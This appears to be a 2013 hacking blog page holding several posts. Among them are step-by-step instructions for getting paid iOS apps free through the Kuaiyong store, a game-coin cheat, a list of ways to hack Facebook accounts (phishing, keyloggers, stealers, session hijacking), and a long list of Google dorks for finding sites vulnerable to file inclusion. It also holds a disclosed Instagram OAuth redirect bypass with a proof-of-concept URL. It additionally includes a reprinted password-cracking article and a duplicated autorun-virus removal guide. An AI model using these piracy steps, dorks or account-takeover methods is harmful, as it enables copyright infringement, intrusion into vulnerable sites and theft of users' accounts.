Breaking News

Friday 31 May 2013

Get Paid Apps For Free on iOS 6 or Below – No Jailbreak Required


Get all paid apps for free on your iDevice that too without jailbreaking on iOS 6!

Sounds cool? Isn’t it. Yes you can install paid apps  for free using an software developed by a Chinese company Kuiyong.

Who is Kuaiyong?

Kuiayong is a Beijing, China Based Software Developing Company Established in 2011, First they Focused in Mobile Applications and later they planned to start some fun with Apple Applications, and later they came up with this trick by July 2012 and it was given by one of their Developer who is just 25 year old named Ching.
As everyone knows many rocking apps and games on App Store are Paid, So they planned to give free apps for iBoys and iGals to have fun with their Lovely iDevice without Jailbreaking!
And now here we will tell you how to get paid apps for free on your iOS device without jailbreak in very simple steps.

Requirments:

  1. iPhone, iPad or iPod.
  2. Computer with internet, installed with Kuiayong software.
  3. Apple Data Cable.

Supported Device and iOS :

  • iPhone 3G, iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5, iPad 2, 3, 4 and Mini as well as  iPod.
  •  iOS 4.3.5, or later.
Step 1: Download and install Kuiyong software ( 2012 Beta 2 or  2013 Beta 1 )
(Note : This Software is in Chinese, but don’t worry, these steps below will explain you clearly)
Step 2: Connect your iPhone, iPad or iPod to your computer, and wait for the software to detect your device , you can confirm whether your device is connected or not by looking at the bottom of the software.
Capture
Step 3: Click on search option and search for your required application. You can also select the drop down to select applications for iPhone , iPad or select both if you  need to download apps for both the devices.
3
Step 4: Once you have selected your app, you can download it by 2 ways:
  1. Click on the icon and you can view all the details of the app and click on red button on the left side, to begin download.
  2. Move your cursor on the app and red button will pop-up , you can directly click on red button to begin your download.
24
Step 5: Once you click on the red button the download will begin, and you can see in the text tab.
6
 Step 6: Wait until the download gets over , then it will automatically get installed on your device .


5
If you found that the application was not installed on your device, just plug-in again and click on install button which is located to the last tab of the required file.

Note:

Windows Vista and XP users, please Close iTunes when you are using this software.
If you are facing any problems regarding sync with iTunes after installing any app through this software please delete the app which you have installed, and try syncing again.

Feel free to comment about this Lovely Trick in our comment section below…
Read more ...

Subway Surfers Hack – Unlimited Coins, Unlock All Characters, Double Coins, 30X Multiplier (No Jailbreak Required)


It’s too hard to collect coins in Subway Surfers. Isn’t it? Well! I’ve got a trick to become rich and purchase some powerups, skip missions and also unlock every characters. This trick gives you unlimited coins without paying a single penny. There are many characters in the game, they are Yutani, Spike, Fresh, Tricky, Jake, Elf Tricky, Frank, Tony, Frizzy, King, Lucy, Ninja, Tagbot, Tasha, Zoe, Brody, and Prince K. Most of them are locked, You will need to unlock them using coins or from mystery box, it’s not a cakewalk.
Subway Surfers Hack

What All You’ll Get?

  • 19104069 coins
  • 30x Multiplier
  • Double coins
  • All charckters unlocked
  • Unlimited hoverboards
  • All boards unlocked
  • All upgrades is full

It’s Time To Fool Your Friends:

Just follow my steps to hack Subway Surfers and get unlimited coins and unlock all characters. It’s not hard as you are thinking. ;)
Step 1:  Download the following file and unzip it. (Document.zip)
Step 2: Connect your iPhone or iPad to PC or Mac.
Step 2: Download iTools and install, then open it.
Step 3: Navigate to “Applications”.
Step 4: Find Subway Surfers and click on the folder icon.
iTools
Step 5: Replace the “Documents” folder with the one mentioned in “Step 1″.
iTools
Step 6: Have fun!

Note: You must quit Subway Surfers and then connect your iPhone or iPad to PC or Mac.
Read more ...

Thursday 30 May 2013

Anatomy of a hack: How crackers ransack passwords like “qeadzcwrsfxv1331”

Killing hashes?

Like Nate Anderson's foray into password cracking, radix was able to crack 4,900 of the passwords, nearly 30 percent of the haul, solely by using the RockYou list. He then took the same list, cut the last four characters off each of the words, and appended every possible four-digit number to the end. Hashcat told him it would take two hours to complete, which was longer than he wanted to spend. Even after terminating the run two after 20 minutes, he had cracked 2,136 more passcodes. radix then tried brute-forcing all numbers, starting with a single digit, then two digits, then three digits, and so on (259 additional plains recovered).
He seemed to choose techniques for his additional runs almost at random. But in reality, it was a combination of experience, intuition, and possibly a little luck.
"It's all about analysis, gut feelings, and maybe a little magic," he said. "Identify a pattern, run a mask, put recovered passes in a new dict, run again with rules, identify a new pattern, etc. If you know the source of the hashes, you scrape the company website to make a list of words that pertain to that specific field of business and then manipulate it until you are happy with your results."
He then ran the 7,295 plains he recovered so far through PACK, short for the Password Analysis and Cracking Toolkit (developed by password expert Peter Kacherginsky), and noticed some distinct patterns. A third of them contained eight characters, 19 percent contained nine characters, and 16 percent contained six characters. PACK also reported that 69 percent of the plains were "stringdigit" meaning a string of letters or symbols that ended with numbers. He also noticed that 62 percent of the recovered passwords were classified as "loweralphanum," meaning they consisted solely of lower-case letters and numbers.
This information gave him fodder for his next series of attacks. In run 4, he ran a mask attack. This is similar to the hybrid attack mentioned earlier, and it brings much of the benefit of a brute-force attack while drastically reducing the time it takes to run it. The first one tried all possible combinations of lower-case letters and numbers, from one to six characters long (341 more plains recovered). The next step would have been to try all combinations of lower-case letters and numbers with a length of eight. But that would have required more time than radix was willing to spend. He then considered trying all passwords with a length of eight that contained only lower-case letters. Because the attack excludes upper case letters, the search space was manageable, 268 instead of 528. With radix's machine, that was the difference between spending one hour and six hours respectively. The lower threshold was still more time than he wanted to spend, so he skipped that step too.
So radix then shifted his strategy and used some of the rule sets built into Hashcat. One of them allows Hashcat to try a random combination of 5,120 rules, which can be anything from swapping each "e" with a "3," pulling the first character off each word, or adding a digit between each character. In just 38 seconds the technique recovered 1,940 more passwords.
"That's the thrill of it," he said. "It's kind of like hunting, but you're not killing animals. You're killing hashes. It's like the ultimate hide and seek." Then acknowledging the dark side of password cracking, he added: "If you're on the slightly less moral side of it, it has huge implications."
Steube also cracked the list of leaked hashes with aplomb. While the total number of words in his custom dictionaries is much larger, he prefers to work with a "dict" of just 111 million words and pull out the additional ammunition only when a specific job calls for it. The words are ordered from most to least commonly used. That way, a particular run will crack the majority of the hashes early on and then slowly taper off. "I wanted it to behave like that so I can stop when things get slower," he explained.
Early in the process, Steube couldn't help remarking when he noticed one of the plains he had recovered was "momof3g8kids."
"This was some logic that the user had," Steube observed. "But we didn't know about the logic. By doing hybrid attacks, I'm getting new ideas about how people build new [password] patterns. This is why I'm always watching outputs."
The specific type of hybrid attack that cracked that password is known as a combinator attack. It combines each word in a dictionary with every other word in the dictionary. Because these attacks are capable of generating a huge number of guesses—the square of the number of words in the dict—crackers often work with smaller word lists or simply terminate a run in progress once things start slowing down. Other times, they combine words from one big dictionary with words from a smaller one. Steube was able to crack "momof3g8kids" because he had "momof3g" in his 111 million dict and "8kids" in a smaller dict.
"The combinator attack got it! It's cool," he said. Then referring to the oft-cited xkcd comic, he added: "This is an answer to the batteryhorsestaple thing."
What was remarkable about all three cracking sessions were the types of plains that got revealed. They included passcodes such as "k1araj0hns0n," "Sh1a-labe0uf," "Apr!l221973," "Qbesancon321," "DG091101%," "@Yourmom69," "ilovetofunot," "windermere2313," "tmdmmj17," and "BandGeek2014." Also included in the list: "all of the lights" (yes, spaces are allowed on many sites), "i hate hackers," "allineedislove," "ilovemySister31," "iloveyousomuch," "Philippians4:13," "Philippians4:6-7," and "qeadzcwrsfxv1331." "gonefishing1125" was another password Steube saw appear on his computer screen. Seconds after it was cracked, he noted, "You won't ever find it using brute force."
The ease these three crackers had converting hashes into their underlying plaintext contrasts sharply with the assurances many websites issue when their password databases are breached. Last month, when daily coupons site LivingSocial disclosed a hack that exposed names, addresses, and password hashes for 50 million users, company executives downplayed the risk.
"Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one," CEO Tim O'Shaughnessy told customers.
In fact, there's almost nothing preventing crackers from deciphering the hashes. LivingSocial used the SHA1 algorithm, which as mentioned earlier is woefully inadequate for password hashing. He also mentioned that the hashes had been "salted," meaning a unique set of bits had been added to each users' plaintext password before it was hashed. It turns out that this measure did little to mitigate the potential threat. That's because salt is largely a protection against rainbow tables and other types of precomputed attacks, which almost no one ever uses in real-world cracks. The file sizes involved in rainbow attacks are so unwieldy that they fell out of vogue once GPU-based cracking became viable. (LivingSocial later said it's in the process of transitioning to the much more secure bcrypt function.)
Officials with Reputation.com, a service that helps people and companies manage negative search results, borrowed liberally from the same script when disclosing their own password breach a few days later. "Although it was highly unlikely that these passwords could ever be decrypted, we immediately changed the password of every user to prevent any possible unauthorized account access," a company e-mail told customers.
Both companies should have said that, with the hashes exposed, users should presume their passwords are already known to the attackers. After all, cracks against consumer websites typically recover 60 percent to 90 percent of passcodes. Company officials also should have warned customers who used the same password on other sites to change them immediately.
To be fair, since both sites salted their hashes, the cracking process would have taken longer to complete against large numbers of hashes. But salting does nothing to slow down the cracking of a single hash and does little to slow down attacks on small numbers of hashes. This means that certain targeted individuals who used the hacked sites—for example, bank executives, celebrities, or other people of particular interest to the attackers—weren't protected at all by salting.
The prowess of these three crackers also underscores the need for end users to come up with better password hygiene. Many Fortune 500 companies tightly control the types of passwords employees are allowed to use to access e-mail and company networks, and they go a long way to dampen crackers' success.
"On the corporate side, its so different," radix said. "When I'm doing a password audit for a firm to make sure password policies are properly enforced, it's madness. You could go three days finding absolutely nothing."
Websites could go a long way to protect their customers if they enforced similar policies. In the coming days, Ars will publish a detailed primer on passwords managers. It will show how to use them to generate long, random passcodes that are unique to each site. Because these types of passwords can only be cracked by brute force, they are the hardest to recover. In the meantime, readers should take pains to make sure their passwords are a minimum of 11 characters, contain upper- and lower-case letters, numbers, and letters, and aren't part of a pattern.
The ease these crackers had in recovering as many as 90 percent of the hashes they targeted from a real-world breach also exposes the inability many services experience when trying to measure the relative strength or weakness of various passwords. A recently launched site from chipmaker Intel asks users "How strong is your password?," and it estimated it would take six years to crack the passcode "BandGeek2014". That estimate is laughable given that it was one of the first ones to fall at the hands of all three real-world crackers.
As Ars explained recently, the problem with password strength meters found on many websites is they use the total number of combinations required in a brute-force crack to gauge a password's strength. What the meters fail to account for is that the patterns people employ to make their passwords memorable frequently lead to passcodes that are highly susceptible to much more efficient types of attacks.
"You can see here that we have cracked 82 percent [of the passwords] in one hour," Steube said. "That means we have 13,000 humans who did not choose a good password." When academics and some websites gauge susceptibility to cracking, "they always assume the best possible passwords, when it's exactly the opposite. They choose the worst."
Read more ...

Tuesday 28 May 2013

Top 10 Ways to Hack Facebook Accounts



Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers have , I have written a couple of post related to facebook hacking here. I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2013, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts.

10 Ways How Hackers Can Hack Facebook Accounts

So here are the top 10 methods which have been the most popular in Everytime :


1. Facebook Phishing

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.


2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will recordevery thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.




3. Stealers


Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.


4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's.



5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.


6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.



7. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.



8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser.



9. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article,


10. Botnets

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.
Read more ...

Saving txt file Bug in IP-Digger v4 Solution


Software Bug
   Bug In IP-Digger v4
As Our users of IP-Digger V4 were facing the problem of Txt document that is saved after performing the Particular task. So , I check teh source again the problem in the saving the Txt document path. So, Here You can get the Txt File after Pentesting or Exploiting a Server .
The Files are getting saved in the Root directory of  the Operating System.
You can check the txt saved files their after Pentesting the IP with IP-Digger in the Root directory You will get the Txt document :)
For Any further Query You can our Contact Us
Read more ...

Remove autorun virus manually


Method 1

1.Open command prompt. Go to Windows, then Run, and type “cmd” . Press enter.
2.Type “cd\” and press enter to get to the root directory of c:\ .
3.Type “attrib -h -r -s autorun.inf” and press enter.
4.Type “del autorun.inf” and press enter.
5.Repeat the same process with other drives, type “d:” and do the same thing. then next “e:”.and restart your computer.
6. Restart your computer and it’s done. Enjoy the freedom to open hard drives on a double click.
Method 2
1.Go to any folder.In that on the top menu go to Tools–> Folder Options, which will be beside File, Edit, View, Favourites.
2.A window pops up after you click on folder options.In that window go to View tab and select the option Show hidden files and folders.Now uncheck the option Hide protected Operating system files.Click Ok
3. Now Open your drives (By right click and select Explore. Don’t double click!) Delete autorun.inf and MS32DLL.dll.vbs or MS32DLL.dll (use Shift+Delete as it deletes files forever.) in all drives include Handy Drive and Floppy disk.
4.Open folder C:\WINDOWS to delete MS32DLL.dll.vbs or MS32DLL.dll (Use Shift+Delete )
5.Go to start –> Run –> Regedit and the Registry editor will open
6.Now navigate in the left pane as follows: HKEY_LOCAL_MACHINE –> Software –> Microsoft –> Windows –> Current Version –> Run .Now delete the entry MS32DLL (Use Delete key on keyboard)
7.Go to HKEY_CURRENT_USER –> Software –> Microsoft –> Internet Explorer –> Main and delete the entry Window Title “Hacked by Godzilla”
8.Now open the group policy editor by typing gpedit.msc in Start –> run and pressing enter.
9. Go to User Configuration –> Administrative Templates –> System . Double Click on entry Turn Off Autoplay then Turn Off Autoplay Properties will display.Do as follows:* Select Enabled* Select All drives
* Click OK
10. Now go to start –> Run and type msconfig there and press Enter.A system configuration utility dialogue will open.
11.Go to startup tab in it and uncheck MS32DLL .Now click Ok and when the system configuration utility asks for restart ,click on exit without restart.
12.Now go to Tools –> Folder Options on the top menu of some folder again and select the Do not show Hidden files and check Hide operating system files.
13.Go to your recyclable bin and empty it to prevent any possiblity of MS322DLL.dll.vbs lying there.
14. Now restart your PC once and you can now open your hard disk drives by double clicking on them
Sometimes “cmd prompt” returns an error “file not found autorun.inf, sometimes some of your hard drives might not be containing the autorun.inf file, so leave those drives and try the next ones.After deleting the file from all of your hard drives, immediately restart your computer. Don’t try to open your drives by double clicking before restarting the machine otherwise you’ll have to repeat whole of the procedure again.Remove autorun virus manually
03:31 |

Method 1

1.Open command prompt. Go to Windows, then Run, and type “cmd” . Press enter.
2.Type “cd\” and press enter to get to the root directory of c:\ .
3.Type “attrib -h -r -s autorun.inf” and press enter.
4.Type “del autorun.inf” and press enter.
5.Repeat the same process with other drives, type “d:” and do the same thing. then next “e:”.and restart your computer.
6. Restart your computer and it’s done. Enjoy the freedom to open hard drives on a double click.
Method 2
1.Go to any folder.In that on the top menu go to Tools–> Folder Options, which will be beside File, Edit, View, Favourites.
2.A window pops up after you click on folder options.In that window go to View tab and select the option Show hidden files and folders.Now uncheck the option Hide protected Operating system files.Click Ok
3. Now Open your drives (By right click and select Explore. Don’t double click!) Delete autorun.inf and MS32DLL.dll.vbs or MS32DLL.dll (use Shift+Delete as it deletes files forever.) in all drives include Handy Drive and Floppy disk.
4.Open folder C:\WINDOWS to delete MS32DLL.dll.vbs or MS32DLL.dll (Use Shift+Delete )
5.Go to start –> Run –> Regedit and the Registry editor will open
6.Now navigate in the left pane as follows: HKEY_LOCAL_MACHINE –> Software –> Microsoft –> Windows –> Current Version –> Run .Now delete the entry MS32DLL (Use Delete key on keyboard)
7.Go to HKEY_CURRENT_USER –> Software –> Microsoft –> Internet Explorer –> Main and delete the entry Window Title “Hacked by Godzilla”
8.Now open the group policy editor by typing gpedit.msc in Start –> run and pressing enter.
9. Go to User Configuration –> Administrative Templates –> System . Double Click on entry Turn Off Autoplay then Turn Off Autoplay Properties will display.Do as follows:* Select Enabled* Select All drives
* Click OK
10. Now go to start –> Run and type msconfig there and press Enter.A system configuration utility dialogue will open.
11.Go to startup tab in it and uncheck MS32DLL .Now click Ok and when the system configuration utility asks for restart ,click on exit without restart.
12.Now go to Tools –> Folder Options on the top menu of some folder again and select the Do not show Hidden files and check Hide operating system files.
13.Go to your recyclable bin and empty it to prevent any possiblity of MS322DLL.dll.vbs lying there.
14. Now restart your PC once and you can now open your hard disk drives by double clicking on them
Sometimes “cmd prompt” returns an error “file not found autorun.inf, sometimes some of your hard drives might not be containing the autorun.inf file, so leave those drives and try the next ones.After deleting the file from all of your hard drives, immediately restart your computer. Don’t try to open your drives by double clicking before restarting the machine otherwise you’ll have to repeat whole of the procedure again.
Read more ...

Wednesday 22 May 2013

Gorgeous look of Windows Blue



Few days ago Microsoft announced to release the new version Windows 8.1 pro, which can also be called as Windows blue. As per the source it is said that Windows 8 is decreasing the Windows users response, and hence Microsoft will be going to do something new and exciting to regain its users.
Lack of Start button on windows 8 leads to the fall in the users of Windows 8, and hence some of the users are asking about to get back the start button in the new version of windows.

Some days ago I have posted to get back the start button in today's windows 8. So if you want start button back then do read that post.

A new image of Windows blue that comes to the internet, revels that there will be start button the the Windows upcoming version. By the above image it is cleared that there will be the start button and this look of Windows Blue is pretty much gorgeous.
This dark dim light screen and the transparent look is much better then the previous one.
Now we can only wait tills its launched and see what will its actual first look.
Read more ...

Dorks to Find RFI/LFI Vuln Websites

salam to all here r some cool dorks to find  RFI/LFI Vuln Websites:


Hope u all would love them..



inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.ru

allinurl:/index.php?file= site:*.ru
Read more ...

Friday 3 May 2013

Hack Instagram Account

For this post, I’m going to show how I was able to hack into Instagram accounts via OAuth vulnerabilities (Instagram.com/facebook.com).
There are basically two ways to take advantage of Instagram OAuth.
1.
Hijack Instagram accounts using Instagram OAuth (https://instagram.com/oauth/authorize/)
2.
Hijack Instagram accounts using Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)

Successful attack will allow us  access to:
  • Private photos
  • The ability to delete photos and edit comments
  • The ability to post new photos.

Because I’m a fun of Instagram,” I thought to myself, “Maybe I should check their security?”
So When Facebook Acquired Instagram, I Started to check them for Security Vulnerabilities,
I reported them several vulnerabilities, Including OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues, So I waited, I waited as a WhiteHat,
Later I received a message from Facebook Security, They said, Even they could not fix it, They still want to pay these vulnerabilities.

Aquired

So I told them, No need for payout, That’s Because they could not perform security checks before the closing of the acquisition,
It’s amazing to see how Facebook Security doing a great job regarding their bug bounty program, Even that they didn’t close the acquirement, They still want to pay for these vulnerabilities.

While researching Instagram’s security parameters, I noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.

Block Differnet domain

In addition, redirection was only allowed to go to the owner app domain. That was particularly bad news for me.
Thus, I needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.

Block Files Folders
For example:
Allow request:
https://apigee.com
Block requests:
Redirect_uri=https://www.breaksec.com
Redirect_uri=https://a.apigee.com/
Redirect_uri=https://apigee.com/x/x.php
Redirect_uri=https://apigee.com/%23,? or any special sign
As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.
While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.
For instance:
Let’s say my app client_id in Instagram is 33221863xxx and my domain is breaksec.com
In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:
Breaksec.com.mx
In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).
domainavaible

It’s also feasible to purchase other breaksec.com domains like:
com.tw
com.mx
com.es
com.co
com.bz
com.br
com.ag
PoC Bypass (Fixed By Facebook Security Team):
https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token

Game Over.

Bug 2.

With this bug, I used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.
For example:
When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.
sharing option instagram

Instagram Would like to access your public profile and friend list
To my surprise, I discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.
This effectively allows the attacker to steal the access_token of any Instagram user,
With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

PoC (Facebook Already fixed this issue):

Read more ...
CopyRight 2015 ComputerInitaite Powered By ComputerInitaite